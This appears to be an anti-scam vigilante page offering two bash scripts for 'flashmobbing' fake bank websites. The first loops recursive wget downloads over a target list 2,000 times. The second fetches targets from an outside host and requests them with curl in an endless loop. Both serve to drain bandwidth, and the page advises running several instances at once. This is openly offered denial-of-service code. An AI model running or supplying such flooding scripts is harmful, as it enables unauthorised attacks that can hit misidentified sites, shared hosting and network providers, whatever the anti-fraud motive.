Disclaimer: As far as we know, all following scripts do nothing more than drain bandwidth from the scammer's websites. However, if you choose to use one of these scripts, you will be doing so at your own risk!
#1: Script for Linux/unix computers
Provided by Bulging BlueVein
This requires 2 files: the 1st file is the script, 2nd file is a list of sites it is going to flash. The script or first file can be used on each flash, and all you need to do is to update the 2nd file with a list of the targets. This script will visit each url, and follow all internal links on each page of the site.
#!/bin/bash # # smashed together by Bulging BlueVein # use to view fake bank websites, repeatedly! #
echo Time to start....
hammerem=1 while [ "$hammerem" != 2000 ] do for sites in ` cat flashlist3` do wget -r $sites -O /dev/null 2>/dev/null done hammerem=$(($hammerem + 1)) echo " pass $hammerem " >>flashmob.log done
echo Completed $hammerem times exit 0
The second file just contains the top level urls of the sites, one to a line. Call the file flashlist3, and keep it in the same directory as the script.
This doesn't rely on anyone's server. Last FlashMob, I was running this, and when all sites were up, on each pass I was utilising 22Meg of laddata per pass. For the technical details, this runs at approx 300k/sec, so depending on bandwidth, a flasher may run several instances of it...
#2: Mac OS X 10.3 Code for Flashmobbing from Console
Provided by jam3s
#!/bin/bash # replace /usr/bin/curl with the path for curl if incorrect (try locate curl) # Get current list of images and values /usr/bin/curl --progress-bar -o /tmp/aa419list http://www.419sport.tk/aa419/targets.php
echo while [ "$hammerem" != -1 ] do for target_url in `cat /tmp/aa419list` do /usr/bin/curl --progress-bar -o /dev/null $target_url done done exit 0